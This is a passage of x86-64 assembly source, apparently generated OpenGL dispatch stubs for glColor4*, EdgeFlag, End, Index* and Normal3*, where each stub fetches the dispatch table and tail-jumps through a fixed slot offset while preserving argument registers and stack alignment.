	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	200(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	200(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	200(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4b), .-GL_PREFIX(Color4b)

/* glColor4bv — dispatch slot 26 (byte offset 208); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color4bv)
	.type GL_PREFIX(Color4bv), @function
GL_PREFIX(Color4bv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	208(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	208(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	208(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	208(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4bv), .-GL_PREFIX(Color4bv)

/* glColor4d — dispatch slot 27 (byte offset 216); four FP args in %xmm0-3 */
	.p2align	4,,15
	.globl GL_PREFIX(Color4d)
	.type GL_PREFIX(Color4d), @function
GL_PREFIX(Color4d):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	216(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$40, %rsp
	movq	216(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	216(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	call	_glapi_get_dispatch
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$40, %rsp
	movq	216(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4d), .-GL_PREFIX(Color4d)

/* glColor4dv — dispatch slot 28 (byte offset 224); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color4dv)
	.type GL_PREFIX(Color4dv), @function
GL_PREFIX(Color4dv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	224(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	224(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	224(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	224(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4dv), .-GL_PREFIX(Color4dv)

/* glColor4f — dispatch slot 29 (byte offset 232); four FP args in %xmm0-3 */
	.p2align	4,,15
	.globl GL_PREFIX(Color4f)
	.type GL_PREFIX(Color4f), @function
GL_PREFIX(Color4f):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	232(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$40, %rsp
	movq	232(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	232(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	call	_glapi_get_dispatch
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$40, %rsp
	movq	232(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4f), .-GL_PREFIX(Color4f)

/* glColor4fv — dispatch slot 30 (byte offset 240); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color4fv)
	.type GL_PREFIX(Color4fv), @function
GL_PREFIX(Color4fv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	240(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	240(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	240(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	240(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4fv), .-GL_PREFIX(Color4fv)
/* Generated dispatch stubs for glColor4{i,iv,s,sv,ub,ubv}: tail-jump
 * through the dispatch slot; four-arg forms push 5 regs (%rbp filler
 * keeps %rsp 16-aligned at the call per the SysV AMD64 ABI). */
/* glColor4i — dispatch slot 31 (byte offset 248) */
	.p2align	4,,15
	.globl GL_PREFIX(Color4i)
	.type GL_PREFIX(Color4i), @function
GL_PREFIX(Color4i):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	248(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	248(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	248(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	248(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4i), .-GL_PREFIX(Color4i)

/* glColor4iv — dispatch slot 32 (byte offset 256); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color4iv)
	.type GL_PREFIX(Color4iv), @function
GL_PREFIX(Color4iv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	256(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	256(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	256(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	256(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4iv), .-GL_PREFIX(Color4iv)

/* glColor4s — dispatch slot 33 (byte offset 264) */
	.p2align	4,,15
	.globl GL_PREFIX(Color4s)
	.type GL_PREFIX(Color4s), @function
GL_PREFIX(Color4s):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	264(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	264(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	264(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	264(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4s), .-GL_PREFIX(Color4s)

/* glColor4sv — dispatch slot 34 (byte offset 272); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color4sv)
	.type GL_PREFIX(Color4sv), @function
GL_PREFIX(Color4sv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	272(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	272(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	272(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	272(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4sv), .-GL_PREFIX(Color4sv)

/* glColor4ub — dispatch slot 35 (byte offset 280) */
	.p2align	4,,15
	.globl GL_PREFIX(Color4ub)
	.type GL_PREFIX(Color4ub), @function
GL_PREFIX(Color4ub):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	280(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	280(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	280(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	280(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4ub), .-GL_PREFIX(Color4ub)

/* glColor4ubv — dispatch slot 36 (byte offset 288); one pointer arg */
	.p2align	4,,15
	.globl GL_PREFIX(Color4ubv)
	.type GL_PREFIX(Color4ubv), @function
GL_PREFIX(Color4ubv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	288(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	288(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	288(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	288(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Color4ubv), .-GL_PREFIX(Color4ubv)
.p2align 4,,15
.globl GL_PREFIX(Color4ui)
.type GL_PREFIX(Color4ui), @function
GL_PREFIX(Color4ui):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 296(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 296(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 296(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 296(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4ui), .-GL_PREFIX(Color4ui)
.p2align 4,,15
.globl GL_PREFIX(Color4uiv)
.type GL_PREFIX(Color4uiv), @function
/*
 * Color4uiv: dispatch stub, slot 38 (offset 304).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned);
 * fallback path lazily initializes _glapi_Dispatch.
 */
GL_PREFIX(Color4uiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 304(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4uiv), .-GL_PREFIX(Color4uiv)
.p2align 4,,15
.globl GL_PREFIX(Color4us)
.type GL_PREFIX(Color4us), @function
/*
 * Color4us: dispatch stub, slot 39 (offset 312).  Argument registers
 * %rdi/%rsi/%rdx/%rcx are preserved across the table-fetch call, with
 * %rbp pushed as padding so %rsp stays 16-byte aligned at the call.
 */
GL_PREFIX(Color4us):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 312(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 312(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 312(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 312(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4us), .-GL_PREFIX(Color4us)
.p2align 4,,15
.globl GL_PREFIX(Color4usv)
.type GL_PREFIX(Color4usv), @function
/*
 * Color4usv: dispatch stub, slot 40 (offset 320).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Color4usv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 320(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 320(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 320(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 320(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Color4usv), .-GL_PREFIX(Color4usv)
.p2align 4,,15
.globl GL_PREFIX(EdgeFlag)
.type GL_PREFIX(EdgeFlag), @function
/*
 * EdgeFlag: dispatch stub, slot 41 (offset 328).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(EdgeFlag):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 328(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 328(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 328(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 328(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EdgeFlag), .-GL_PREFIX(EdgeFlag)
.p2align 4,,15
.globl GL_PREFIX(EdgeFlagv)
.type GL_PREFIX(EdgeFlagv), @function
/*
 * EdgeFlagv: dispatch stub, slot 42 (offset 336).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(EdgeFlagv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 336(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 336(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EdgeFlagv), .-GL_PREFIX(EdgeFlagv)
.p2align 4,,15
.globl GL_PREFIX(End)
.type GL_PREFIX(End), @function
/*
 * End: dispatch stub, slot 43 (offset 344).  No argument registers
 * need saving; %rbp is pushed purely so %rsp stays 16-byte aligned
 * at the table-fetch call.
 */
GL_PREFIX(End):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 344(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 344(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(End), .-GL_PREFIX(End)
.p2align 4,,15
.globl GL_PREFIX(Indexd)
.type GL_PREFIX(Indexd), @function
/*
 * Indexd: dispatch stub, slot 44 (offset 352).  The FP argument lives
 * in %xmm0 (caller-saved), so its low 64 bits are spilled to the stack
 * across the table-fetch call.  The 8-byte frame also restores 16-byte
 * stack alignment at the call.
 */
GL_PREFIX(Indexd):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 352(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 352(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexd), .-GL_PREFIX(Indexd)
.p2align 4,,15
.globl GL_PREFIX(Indexdv)
.type GL_PREFIX(Indexdv), @function
/*
 * Indexdv: dispatch stub, slot 45 (offset 360).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Indexdv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 360(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexdv), .-GL_PREFIX(Indexdv)
.p2align 4,,15
.globl GL_PREFIX(Indexf)
.type GL_PREFIX(Indexf), @function
/*
 * Indexf: dispatch stub, slot 46 (offset 368).  The FP argument in
 * %xmm0 is spilled to an 8-byte stack slot across the table-fetch
 * call; the frame also restores 16-byte stack alignment.
 */
GL_PREFIX(Indexf):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 368(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 368(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexf), .-GL_PREFIX(Indexf)
.p2align 4,,15
.globl GL_PREFIX(Indexfv)
.type GL_PREFIX(Indexfv), @function
/*
 * Indexfv: dispatch stub, slot 47 (offset 376).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Indexfv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 376(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexfv), .-GL_PREFIX(Indexfv)
.p2align 4,,15
.globl GL_PREFIX(Indexi)
.type GL_PREFIX(Indexi), @function
/*
 * Indexi: dispatch stub, slot 48 (offset 384).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Indexi):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 384(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexi), .-GL_PREFIX(Indexi)
.p2align 4,,15
.globl GL_PREFIX(Indexiv)
.type GL_PREFIX(Indexiv), @function
/*
 * Indexiv: dispatch stub, slot 49 (offset 392).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Indexiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 392(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 392(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 392(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexiv), .-GL_PREFIX(Indexiv)
.p2align 4,,15
.globl GL_PREFIX(Indexs)
.type GL_PREFIX(Indexs), @function
/*
 * Indexs: dispatch stub, slot 50 (offset 400).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Indexs):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 400(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 400(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 400(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 400(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexs), .-GL_PREFIX(Indexs)
.p2align 4,,15
.globl GL_PREFIX(Indexsv)
.type GL_PREFIX(Indexsv), @function
/*
 * Indexsv: dispatch stub, slot 51 (offset 408).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Indexsv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 408(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 408(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 408(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 408(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Indexsv), .-GL_PREFIX(Indexsv)
.p2align 4,,15
.globl GL_PREFIX(Normal3b)
.type GL_PREFIX(Normal3b), @function
/*
 * Normal3b: dispatch stub, slot 52 (offset 416).  Argument registers
 * %rdi/%rsi/%rdx are preserved across the table-fetch call; the three
 * pushes also keep %rsp 16-byte aligned at the call.
 */
GL_PREFIX(Normal3b):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 416(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3b), .-GL_PREFIX(Normal3b)
.p2align 4,,15
.globl GL_PREFIX(Normal3bv)
.type GL_PREFIX(Normal3bv), @function
/*
 * Normal3bv: dispatch stub, slot 53 (offset 424).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Normal3bv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 424(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3bv), .-GL_PREFIX(Normal3bv)
.p2align 4,,15
.globl GL_PREFIX(Normal3d)
.type GL_PREFIX(Normal3d), @function
/*
 * Normal3d: dispatch stub, slot 54 (offset 432).  The three FP
 * arguments in %xmm0-%xmm2 (caller-saved) are spilled to a 24-byte
 * stack frame across the table-fetch call; 24 bytes also keeps %rsp
 * 16-byte aligned at the call.
 */
GL_PREFIX(Normal3d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 432(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Normal3d), .-GL_PREFIX(Normal3d)
.p2align 4,,15
.globl GL_PREFIX(Normal3dv)
.type GL_PREFIX(Normal3dv), @function
/*
 * Normal3dv: dispatch stub, slot 55 (offset 440).  PTHREADS path saves
 * %rdi around the table fetch (push keeps %rsp 16-byte aligned).
 */
GL_PREFIX(Normal3dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 440(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 440(%rax), %r11
